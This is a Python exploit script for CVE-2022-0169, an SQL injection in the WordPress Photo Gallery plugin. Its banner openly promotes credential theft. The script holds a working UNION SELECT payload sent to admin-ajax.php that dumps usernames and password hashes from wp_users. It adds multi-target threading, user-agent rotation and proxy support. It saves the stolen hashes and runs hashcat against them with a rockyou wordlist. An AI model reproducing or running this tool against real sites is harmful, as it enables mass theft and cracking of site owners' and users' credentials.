#!/usr/bin/env python3 import argparse import requests import threading import re import os import sys import time import random import subprocess from urllib.parse import urljoin from datetime import datetime from rich.console import Console from rich.progress import Progress, SpinnerColumn, TextColumn console = Console() USER_AGENTS = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)", "Mozilla/5.0 (X11; Linux x86_64)", "Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X)", "Mozilla/5.0 (Android 11; Mobile; rv:86.0)" ] BANNER = r""" [bold magenta] ( ) ) ) ) ) ) ( ) )\ ( ( ( ( /( ( /( ( /( ( /( ( /( ( /( )\ ) ( /( (((_) )\ )\ )\ ___ )(_)))\()) )(_)))(_))___ )\()))\())(()/( )\()) )\___ ((_)((_)((_)|___|((_) ((_)\ ((_) ((_) |___|((_)\((_)\ /(_))((_)\ ((/ __|\ \ / / | __| |_ )/ (_)|_ )|_ ) / (_)/ (_)(_) / / _(_) | (__ \ V / | _| / /| () | / / / / | () | | | / _ \\_, / \___| \_/ |___| /___|\__/ /___|/___| \__/ |_| \___/ /_/ [/bold magenta] [bold green] * WordPress Photo Gallery SQLi💉 CVE-2022-0169 + Version Checker * Dumps wp_users creds. Feed them to hashcat like candy. <<>> Insta @mindfuckerrrr [/bold green] """ lock = threading.Lock() def check_wp_version(target, proxy, headers): version_url = urljoin(target, '/readme.html') try: r = requests.get(version_url, timeout=10, proxies=proxy, headers=headers, verify=False) if r.status_code == 200: match = re.search(r'Version ([0-9.]+)', r.text) if match: console.print(f"[bold cyan][~] WordPress Version:[/bold cyan] {match.group(1)}") else: console.print(f"[yellow][!] Could not find version info [/yellow]") else: console.print(f"[yellow][!] /readme.html not found on {target}[/yellow]") except Exception as e: console.print(f"[red][!] Version check fail, Damnit!: {e}[/red]") def exploit(target, run_id, proxy): headers = {'User-Agent': random.choice(USER_AGENTS)} check_wp_version(target, proxy, headers) payload = '?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(user_login,%200x3a,%20user_pass),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20wp_users%20--%20g' full_url = urljoin(target, '/wp-admin/admin-ajax.php') + payload with Progress(SpinnerColumn(style="magenta"), TextColumn("[progress.description]{task.description}")) as progress: task = progress.add_task(f"[cyan]Exploiting:[/cyan] {target}", total=None) try: r = requests.get(full_url, timeout=15, proxies=proxy, headers=headers, verify=False) progress.update(task, completed=1) except Exception as e: console.print(f"[red][!] Connection fail ffs: {e}[/red]") return if r.status_code == 200: folder = f"results/{run_id}" os.makedirs(folder, exist_ok=True) fname = target.replace('https://','').replace('http://','').replace('/','_') with open(f"{folder}/{fname}.html", 'w') as f: f.write(r.text) creds = re.findall(r'([a-zA-Z0-9._%-]+:[^\s<]+)', r.text) creds = [c for c in creds if ':' in c and '$' in c] if creds: ts = datetime.now().strftime('%H%M%S') hashfile = f"{folder}/hashes_{ts}.txt" with lock: with open(hashfile, 'a') as f: for c in creds: f.write(c + '\n') console.print(f"[bold green][+] Found creds:[/bold green] {', '.join(creds)}") return hashfile else: console.print(f"[yellow][!] No creds found on {target}[/yellow]") else: console.print(f"[red][-] HTTP {r.status_code} from {target}[/red]") return None def run_hashcat(hashfile, wordlist): console.print(f"[cyan][~] Running hashcat on {hashfile}[/cyan]") cmd = f"hashcat -m 400 -a 0 {hashfile} {wordlist}" console.print(f"[yellow]Command: {cmd}[/yellow]") subprocess.call(cmd, shell=True) def main(): console.print(BANNER) parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', help='Target URL') parser.add_argument('-f', '--file', help='File with targets') parser.add_argument('-t', '--threads', type=int, default=5, help='Threads (default: 5)') parser.add_argument('-p', '--proxy', help='Proxy (e.g., http://127.0.0.1:8080)') parser.add_argument('-w', '--wordlist', default='/usr/share/wordlists/rockyou.txt', help='Wordlist for hashcat (default: rockyou.txt. Make sure it is gunzipped)') args = parser.parse_args() proxy = {"http": args.proxy, "https": args.proxy} if args.proxy else {} targets = [] if args.url: targets.append(args.url.strip()) elif args.file: with open(args.file) as f: for line in f: if line.strip(): targets.append(line.strip()) else: console.print("[red]Gimme -u or -f broski...[/red]") sys.exit(1) run_id = datetime.now().strftime('%Y%m%d_%H%M%S') console.print(f"[bold cyan][~] Run ID:[/bold cyan] {run_id}") found_hashfiles = [] threads = [] def worker(t): hf = exploit(t, run_id, proxy) if hf: found_hashfiles.append(hf) for t in targets: th = threading.Thread(target=worker, args=(t,)) th.start() threads.append(th) if len(threads) >= args.threads: for x in threads: x.join() threads = [] for x in threads: x.join() console.print(f"[bold green][*] Done! Dumps: results/{run_id}[/bold green]") if found_hashfiles: choice = input(">>> Crack the hashes with hashcat now? [Y/N]: ") if choice.strip().lower() == 'y': for hf in found_hashfiles: run_hashcat(hf, args.wordlist) else: console.print("[yellow][!] No hashes found to crack.[/yellow]") if __name__ == '__main__': main()